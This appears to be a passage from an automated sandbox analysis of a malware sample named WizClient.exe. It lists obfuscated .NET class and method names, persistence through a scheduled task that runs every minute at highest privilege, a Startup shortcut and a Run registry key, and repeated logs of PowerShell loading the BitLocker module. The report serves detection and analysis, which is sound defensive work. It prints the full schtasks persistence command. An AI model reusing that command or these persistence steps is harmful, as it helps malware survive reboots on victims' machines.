            Source: WizClient.exe.3.dr, qOlbqtOy3nZsg049IR9xh9XXfTtsI69WcgczyQuOaYa9BTHpYkbGuudjcn.csHigh entropy of concatenated method names: 'HOuEa3Zvj1bkpXohST39J5fUpTGELwiH1w9ETx0MHtMD1dM738PGIQ4gPq', 'AunpeS6JAWa5d3UXyC9Oeuny3RnP8XtqTKhBiYXGRJhtQLOalfC2s8H6Ov', 'U2tyQESLw9mPfb4kfGr63OtVHkXQBtoyssfO7mqifg3PDWRLFLnf0JWRT9', 'j3lCJ4fW13qxuAeSdtwBeoa8j9mXdchzVhTS7X5LLXcREcQs9TaJOpHYfv', 'hpzGed2WF0bp5wkb53XoytNT4BzOR8VgDu4Rr1x47qifaJyXXlD3SYYHmCLl6wvAzIQg2cc', 'DoWPuwYC5HplI0bQlXwbinY0honWSMWdFZPymWhj9a3z10ygkW2asVai2wjVXL5Iu1nTDcU', '_3fimPMffWtclg46LH0mYTJRunZJ4C26sm4Duo7StywgtSvL47MFdVPRBKq3M0jO7BfoEIi6', 'XUhpihiWkbyxcyE8iQizrHqZ06aa6uOkgh0jL8WEroRlNPk0wpGmcFX3Rh0LQq0uapOWCEh', 'ee4SevjyWpRtlJDYFZthMDHsdDlVkFeRfLFdlrJKaBCLgwZoUaGmbpqKlcmDrLq3JpQx7P7', 'm8pZwWnmeWQKM8QhlprkEfxKa1tZqPL7RLoUy8h3kfhUPgKoMoxuFEe6q61NjiN9Tl4HPcd'
            Source: WizClient.exe.3.dr, Ek86NJ4u0lYNcFFfGPaK8N7q4H.csHigh entropy of concatenated method names: 'kwOYrNRJ3t54pzdK0wDsTyjfZr', 'k6zBEkqlcFwI5qkVNlGQVybSfc', '_967p4QzWzl4sjKjVI6LP6JovKz', '_38yWIY4pjOhGkxnUFgkKDH2wqc', 'CeP4lJb4SLZay5YCFNbHphU6zz', 'lMj2dWg45B9x6dHekDnMeE4JBJ', 'nbVDNLODmndVuHchyj3jaJb5ZS', 'zq00kEvWqPjL2yQgQ7NsTefceq', '_9LFmKwmtzNt6KW1TJCG3h72Pmv', '_2InWy99wCgxUKpSsqrYM7QR7Bb'
            Source: WizClient.exe.3.dr, 0P7cX6mhUWvCKl1xVWC4KX2tdlAwsSBqffiDvrTAddY5PeYXwvnz1VdzUzzPuY88ZQ1SDktdlp2v1KbkO4wA.csHigh entropy of concatenated method names: 'ZdE9TnILk7UK8Ctn1X9xIloiW3fzpsIplUvT2WEzLppgsA5zkMvq2n6twfljtG6Uq78eevWWlXDzWdU45xJL', 'tLC86auKj0WQzGntU9j93omchx1HSt3sOsqPUt9IN5dWTyjqc1gQilcYyFqwcUokKo3LXV8GgA06VXXnKVYO', 'uLApGWAUlqqkirAJ6FbGrcWPl5Hm7fAyOEwkBKVIPlXIosI9oJ0zk9II1AAgewtJKeVCDct6paVnhQkivGKU', '_526E1qBqFfCe0HOml1ZXhkBeRQJwpat0gzaDIDcWQbk9WzcrpqygzP7NcRJUebbZZoCBa8u7sDMBmO4J7ltn', 'H73t7bcMbKelzqH9DHxcxxaTr8', '_2c5SQaPBj6jsR3k1gQZS1wZkx0', 'VsHwyy5CymRiBG0EHkd4X', 'cdPFcBTrnStZZIXmXOZEk', 'J63UVNlhwtAHe1zbkVQh6', '_2o5j3O6uRLVayWVcchPgc'
            Source: WizClient.exe.3.dr, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.csHigh entropy of concatenated method names: 'P52Oul3OvEUaTGWtu7esVhC4nFKBzTJgtgWWYCGOXrrdvfAve4HpdUfmnA', 'JsKdkvtGmfBzMs4W2Kct4KN63xJfoyDOlpLoKhdXd1R7XQi5QkFGObCUQL33BRgzNRzLIF9', '_699wu3u0UTRUiEqp6y47oIBIa1VzwpHSkTIfL0Q07kjEQAb4Yh8cdtV3x0sqw5iK7KgOTfo', 'dchtpDAHa96lz91p0DFKqv2sCKM69ttmyrJMafceOAvT97btRovWIsllTexOeNUndDwRGK6', 'XXiTN4ZGSvZH550XttE2YGCCfXw8eGwpL1ymQxRvWN5JHpN9mZAaUI7ruhkHWFnyewe3vNh'
            Source: WizClient.exe.3.dr, LmsEL10c0LQ0GfKv8vXLMbVMAS.csHigh entropy of concatenated method names: 'BsuajXCmmq73QtMRZgxz6iLzLW', 'q4hMCmCkhkejDGnxNXAJiFrQVV', 'Iy0PglG8N90fmPknsvMjR2o4Oq', '_7LhFRYfL6Vdw6IjgT058kw9T98', 'uozjmRxdiUarqB46zF5JNMzlFC', 'HBm9tCahLIjtkawviQxzYCNG3HODqyt9DJWXfQK1WCwgiVlhXNprxXxHgA', 'n4VhXOhRSBX94AGqZAMcl1JiUwJjDQLEXdATvl1QqkDw9mR1aWUoJZDG3w', 'clxHfQspzu095U3JiL4nelLH7QgvjonqUqUr28Q5HfANUnUT6ppXMDhIou', 'UJhsB9LByePKWUXSnUHOIs4axTdfr0beJZzOhFjJfNQxuzhXSOYOMYVKnv', 'sxe9wv47f9yWp6ZpoKSt2qo7Dte0FArsKcErFtsj0rduqjtTLuc6suSUn0'
            Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csHigh entropy of concatenated method names: '_6h8Z4ist3loJG9DkEkvXiJ5y14rQDEKhLtqiHcH0KsY4vWf8QPXip4W6xs', 'NgDjqwloMfLXHy24Pvvrxk5BtSt8rwUdoLmtowCJZwo7adV23Psv9Gw2iW', 'coLP3NtnRnckEUoqrE9wTMfWC53TLLTHtSmBvH8jEUzinPdU2ePrEEU4Ot', 'MJxVb273xXPrzvyWNqriWohVB46XQ1lCg7MJFaC4meIit4WrYYuABqUcuP', 'D7AJUPhuHrjMr6mheZlIA8xip09HhxvsnkDvd2Cy0YiQ06fyxVslFucJOQ', 'rpFCk9LIWYjgDlz5LQeNvwGlwgnFaxhRPyMcNNOteakUJB9GFXb9Bnhc5P', 'Ps6Wx0i9xfH8ZPBoLzukJY9hRmVVvMKQYt8x0w4yOgHOg2e2NIqOc5Av4c', 'vpRGMI7L36biZK4ls07oB8TtHseipkPD2qpOId8oiQyZPwduyAf8y9aZ9i', '_0saOAClBBCrUBZqS0rQqAXoDAt0AACsMSeRzLKkuc3MHMFfb6TUsESUdgC', 'UtPBnGBAluLu0XsTlVry8F99bn1DNqU3RMccXBkrFU8aUQQKCxL2U1GSwb'
            Source: WizClient.exe.3.dr, aiCsB5NUHwfKY0UEXSFHtMA6LD.csHigh entropy of concatenated method names: 'A0tuI0bLer3YTx1jA6EEESfGTa', 'cqXrlIY5WB7vZd1mZr48EJ8tkWxeP915IVjaFlkNRA3EJE7DvqV0Pl5tgFFa0jGhRZttvLsMVbvEB0KtxBtHaD', 'XYrNc729kyWU1r27HKZsE1MuwH6zaiVIQ7RKXAxfMyaoMvB0qKTMh1rHfJcT21PIDQ9kR6tqArXoJL9zPoU1Z3', 'DSli6v94EtYJCwVNnMmAuo2uR1Y3DahwSOgR3oemlUDY0nppG2OIigsKncXAzukOeQYytzX72xa7zMyoSPe1Uz', '_3ZtZir52XfXobJO0MDmwdRmuHt1IIrliyf3GdQXrHmOoeDX7CifdEt2RIjuyHTd4OxCvQi1hErWEFRWnyJBmlV'
            Source: WizClient.exe.3.dr, shmYJX63MoDoDf0kg7JYt6GmNt.csHigh entropy of concatenated method names: '_7LdIpktSdxVScKmQazIPcc9yZD', '_8l8X6QalFJY7Q2AWjHkgqebmhV', '_8G1rMDOqFEvCny1AafZz38l9Uq', 'lziHXKhxa6RF21QVoeUbyRSyPw', '_1S0umYTw98MYOI8wmuriFSrVbD', 'KqNsuo7CAmtxPKItURTsyO0s0Y', '_59DE5ZeRaSNInNOKz7JRVhoDUB', 'PC97umrvLy9wTTb1tQW0IzW8nK', 'TIPRZU6wqjGuKMDhXLxlXYLWnb', 'yuTxu678GPrCbenOoi3eoivM7y'
            Source: C:\Users\user\Desktop\WizClient.exeFile created: C:\Users\user\AppData\Local\WizClient.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"
            Source: C:\Users\user\Desktop\WizClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnkJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnkJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WizClientJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WizClientJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
